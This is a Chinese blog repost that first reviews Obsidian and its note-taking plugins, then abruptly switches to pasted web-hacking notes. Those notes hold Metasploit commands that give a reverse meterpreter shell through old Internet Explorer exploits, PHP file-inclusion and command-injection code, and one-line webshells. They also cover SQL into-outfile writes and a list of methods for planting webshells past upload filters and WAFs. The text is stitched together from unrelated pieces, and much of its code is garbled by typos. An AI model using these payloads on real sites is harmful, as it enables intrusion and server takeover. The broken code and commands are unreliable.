笔记工具合集
Posted 个人渣记录仅为自己搜索用
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了笔记工具合集相关的知识,希望对你有一定的参考价值。
在csdn上留了太多的垃圾东西,是时候把笔记功能转移了,csdn以后只是用来发表干货.
笔记:
1. 大一统笔记,
Obsidian 你搜索 "Obsidian 绘图" 和 "Logseq 绘图" 就知道选择啥了.
评测来自: 双链笔记软件综合评测:Roam Research、 Obsidian、Logseq、思源笔记 、Roam Edit 、RemNote、葫芦笔记、TiddlyWiki、Athens、Trilium
2. 双链的本质
1. 用法1 是父主题和子主题之间的双链. (所有的脑图串成脑图). 一个文章可能是多父主题的, 同样可以.
结合"Note Refactor" 可以实现文章的结构化整理 , 先有细节再有文章主题,个人学习的沉淀大抵如此, 出书或者教人做事是基于此后,先有大纲再让对方来填充.
进一步可以利用此
2. 用法2 标签用法. 类似 已读未读. 术语标注(双链之前已经有关键词自动链接技术)
3. 结合如上两种做法实现, 一个静态网站的功能.
3. 知识的本质 树状结构化
from 空谷 : 可能会有人惊叹我在构建《价值投资系统》中的结构化思路,要知道这背后是我 8 年以来, 10+大领域,100+小领域,4000+笔记的分类训练之后才形成的能力。
那什么是「知识体系」?「知识体系」是对真实世界的客观描述,这是需要不断被抽象,构建,重组的知识。
我们都知道思维是网状的,这句话没错,但是把这句话用在知识管理上,我觉得有失偏颇。因为思维与知识完全不等价。因为知识反应了客观,而思维则是主观。我一直认为严谨的知识一定是树状、结构化的。而应用知识的过程则是网状。这也分别映射了「知识体系」和「应用笔记」的特点。
* Obsidian的同步
详见"Obsidian全平台同步策略"
3. Obsidian的插件
Obsidian 插件之 Excalidraw
在 Obsidian 中实现数据绘图 ( 使用plotly插件实现将数据绘图嵌入到markdown笔记中。)
4. Obsidian的文章重构
Note Refactor
5.
其他插件: 拒绝折腾伪需求,我最爱用的 Obsidian 实用插件推荐。
漫游笔记: 每次点击后会随机出现你的一篇笔记,就是这么个简单的功能。
Customizable Menu & ToolBar & Page Header and Title Bar:
- Menu:右键菜单
- ToolBar:边栏
- Page Header and Title Bar:Obsidian 上边栏和标题栏
Advanced Tables: Advanced Tables所见即所得的表格
Media Extended & Media Extended BiliBili Plugin:
Mind Map
Privacy Glasses: 可以为你遮蔽除了鼠标光标所在处以外的所有信息,让你在任何环境不必担心重要信息被看到,已经更自在地码字。
- Copy button for code blocks:为代码块增加一个复制按钮
- Hider:隐藏字数统计、滚动栏、上边栏、侧边栏
- Advanced Appearance:更好看的外观
- Outliner:优化项目清单使用体验,例如 cmd + A 会选择当前项目而非全文
- Collapse All:增加折叠所有文件夹的按钮
- Footnote Shortcut:使用快捷键意见生成自动编号的脚注,并将光标切换到末尾写脚注
- Better footnote:鼠标放在脚注上直接显示脚注内容
其他漏洞笔记合集
xss跨站漏洞纯手打笔记(基础)
XSS漏洞扫描
常用工具:
wvs
椰树
safe3
Xelenium
w3af
vega
xss扫描插件+burp
Beef:
beef+msf拿客户端shell(ie6 xp)
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tvp PAYLOAD =>wondows/meterpreter/reverse_tcp
set SRVHOST (my ip)
set SRVPORT 7777
set URIPTH /
set LHOST(MY IP)
set LPORT 4444(端口)
cxploit
beef+msf拿客户端shell(ie7.8.9)
use exploit windows/browser/ie_execcommand_uaf
show options
set SRVHOST (my ip)
set SRVPORT 8888(端口)
set URIPATH /
cxploit
留后门:
写入管理员登录页面
永久劫持管理员cookie
xss平台搭建:
使用工具:
wamp2.2+xss.me源码
文件包含漏洞:利用条件
1.include()等函数通过变量的方式引入需要包含的文件
2.用户能控制该动态变量
文件包含漏洞是代码注入的一种,原理就是注入一段用户能控
制的脚本或代码,并让服务器端执行,代码注入的典型代表就
是文件包含file inclusion。文件包含可能会出现在jsp php
asp等语言中,常见的导致文件包含的函数如下:
php:
include(),include_once(),require(),require_once
(),fopen(),readfile().....
当使用者4个函数包含一个新文件时,该文件将作为php代码执行,php内核并不在意该被包含的文件是什么类型,
<?ph$test=$_GET["x"];inxlude($test);?>保存为include.php
在同一个目录下创建为test.tst内容为<?php phpinfo()?>
访问链接,将xx.txt传送给c并赋予test变量
远程文件包含:
如果php的配置选项allow_url_include为on,则
include/require函数是可以加载远程文件的,这种漏洞被称
为远程漏洞(RFI)
代码:
<?php$test=$_GET["c"];include($test);?> 保存为
include.php
JSP/Servlet:ava.io.file(),java.io.filereader()....
ASP:include file,include virtual....
本地文件包含漏洞利用技巧:
1.包含用户上传的文件
用户上传的文件内容中如果包含了php代码,那么这些代码被
include()加载后将会被执行
2.包含日志文件,比如Web Server的access Log.
同过构造与句让服务器报错并将一句话虽报错信息写入日志,
找到日志文件,用菜刀链接,拿下网站。
3.包含data://或者php://input等伪协议
4.包含了Session文件
实验:ekucms2.5》制作错误,写入一句话木马》
($_POST[x])}
命令注入漏洞:
php命令执行函数:
在php中可以使用下列5个函数来执行外部的应用程序或函数
1.system:执行一个外部的应用程序并显示输出的结果
system函数:
原型:string system(string command,int &return_var)
其中,command
是要执行命令, return_var存放执行命令的执行后的状态值
同样,构造php代码如下:
<?php $cmd = $_GET["cmd"]echo"<pre>";system
($cmd);echo"</pre>";?>
在浏览器中访问这个php文件,并提交cmd的内容为"net
start" 黑客目的是通过命令注入攻击查看web服务器主机都开
启了那些服务
2.exec:执行一个外部的的应用程序
函数原型如下:
string exec (string command,array &output,int
&return_var)其中,command是执行的命令,output是获得执行
命令输出的每一行字符串,returm——var存放执行命令后的
状态值
构造php代码如下:
<?php $x=$_GET["x"];echo shell_exec($x);?>
3.passthru:执行一个UNIX系统命令并显示原始的输出
Passthru函数以用来执行一个UNIX系统命令并显示原始的输出
,当unix系统命令的输出是二进制的数据,并且需要直接返回
值给浏览器时,需要使用passthru函数来代替system与exec函
数。
passthru函数原型如下:
void passthru (string command,nit &returm_var)
其中,command是要执行的命令,returm_var存放执行命令后
的状态值
构造php代码如下:
<? $cmd = $_GET["cmd"]echo"<pre>";system
($cmd);echo"</pre>";?>
4.shell_exec:执行shell命令并返回输出的结果的字符串
函数原型如下:
string shell_exec(string command)
其中,command是要执行的命令
代码如下:
<? $cmd = $_GET["cmd"];echo "<pre>";sehll_exec
($cmd);echo "</pre>";?>
5. "‘‘"运算符:与shell_exec函数的功能相同
变量覆盖漏洞:
产生:变量如果没有初始化,而且能被用户控制,
在php中,若register_globals为on(启用)时非常严重
此为全局变量覆盖漏洞
代码:
<?php
$x="xxx";
$y="seven";
echon $x;
echon "<hr>";
echon $y;
echon "<hr>";
$y=$_GET["x"];
echon $y
?>
下载漏洞:
利用:通过蜘蛛爬行,找到该url,下载 conn.asp config.php config.asp db.ndb
(谷歌黑客:/down.asp?fileup=)
webshell:
爆破webshll密码:
burpsuite
webshell密码爆破器
拿webshell方法总结:
管理权限拿:
14种常见的:
1.正常上传:网站对上传文件后缀格式并为过滤,直接上传webshell就可以。(不限制上传类型,可随意上传伪装的木马)
2.数据库备份拿:网站对上传的文件后缀进行过滤,不允许上传脚本类型文件,如:asp php jsp aspx等。而网站具有数据库备份功能,这时我们就可以将webshell格式先改为允许上传的文件格式如:jpg gif等。然后,我们找到上传后的文件路径,通过数据库备份,将文件备份改为脚本格式。
3.本地js验证突破拿webshell:当网站设置了js来限制文件类型时,我们可以通过删除js验证或者修改上传类型突破上传拿webshell,使用burpsuite或者fiddle
等代理工具提交,本地文件先改为jpg,上传时拦截,在把文件扩展名改为asp或者php即可。
4.上传其他脚本类型拿webshell:这种类型用于一台服务器具有多个网站,a网站是asp的站,b可能是php的站,a中限制了上传文件类型为asp的文件,你可以尝试上传php的脚本来拿webshell。
5.(和编辑器配合)利用解析漏洞拿wbeshell:(常见的编辑器fckeditor,ewebeditor,cheditor)
IIS 5.x/6.0解析漏洞
IIS 7.0/IIS 7.5/ Nginx <8.03畸形漏洞
Nginx <8.03 空子节代码执行漏洞
Apache解析漏洞
6.网站配置插马拿webshell:通过找到网站默认配置,讲一句话查到网站配置中,不过为了能成功执行插马,建议先下载该网站源码,进行查看源码过滤规则,防止插马失败;
"%><%eval request("hydra")%><%"(闭合一句话)
7.通过编辑模板拿webshell:通过网站的模板进行编辑写入一句话,然后生存脚本文件拿webshell,或者通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿webshell。(有的网站可以修改添加脚本文件,直接拿swebshell)
8.数据库命令执行拿webshell:可以通过phpmyadmin登录数据库命令来写一句话拿webshell。
Hydra TABLE study (cmd text NOT NULL)
Insert INTO study (cmd) VALUES(‘<?php eval ($_POST[cmd])?>‘)
select cmd feom study into outfile‘D:/php/www.htdocs/test/seven.php‘
Drop TABLE IF EXISTS study
9.通过静态页面拿webshell:通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿
也通过将木马添加到压缩文件,把名字改为网站模板类型上传到网站服务器拿
10.(上传特殊马拿webshell:一些网站安装了waf安全狗,360,我们可以通过上传一些免杀马,变形马来进行突破封杀。)文件包含拿webshell:先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可以绕过waf,
asp包含:<!--#indude file="xx.jpg"--> 调用的文件必须和被调用文件在同一目录,否则找不到,绕过在不同的目录下,用下面的语句:<!--#indude virtual="文件所在目录/xx.jpg">
php包含:
<?php
indude("xx.jpg");
?>
普通权限拿webshell:
1.0day拿webshell:这个不多说。可以去网上搜索一些,比如你找到你搞的网站cms是discz的,你可以搜索一些相关0day直接拿
2.修改网站上传类型配置拿webshell:有的网站,在网站上传类型中限制了上传脚本类型文件,我们可以通过添加文件上传类型,如天剑 asp php jpg aspx asa来拿webshell。(非常老的方法不过有的网站还是存在。如果运气好可以碰到)
3.IIS写权限拿webshell:比较少见,有专门的利用工具,原理是通过找到有iis写入权限的网站,put进去一个txt的文件,目录必须有刻写的权限,如image文件夹,然后通过move方法,把txt格式的木马move成脚本格式,如一开始上传的是xx.txt move成xx.asp。
4.通过远程命令执行拿webshell:关于命令执行,php程序相对来说比较多见,可以通过执行一些系统命令进行拿webshell。
5.strusts2拿webshell:网上有工具可以直接拿。(这种漏洞凤毛菱角,几乎灭绝了)
6.通过用户头像上传拿webshell(Ps:需要抓包改包):用户注册后有些网站可以上传图片,附件,文件等,可以利用上传拿webshell。
7.通过注入漏洞拿webshell:要有足够的权限,对写入木马的文件夹有写入权限,知道网站绝对路径。
对于MySQL注入漏洞网站可以通过log备份,差异备份拿webshell。也可以通过into file 函数将一句话木马写入拿webshell,还可以利用phpmyadmin 将木马导出拿webshell。
以上是关于笔记工具合集的主要内容,如果未能解决你的问题,请参考以下文章
实用工具和网站合集分享
实用工具和网站合集分享
实用工具和网站合集分享
笔记cookies管理工具类
Rhino Grasshopper 参数化建模 资源合集
Rhino Grasshopper 参数化建模 资源合集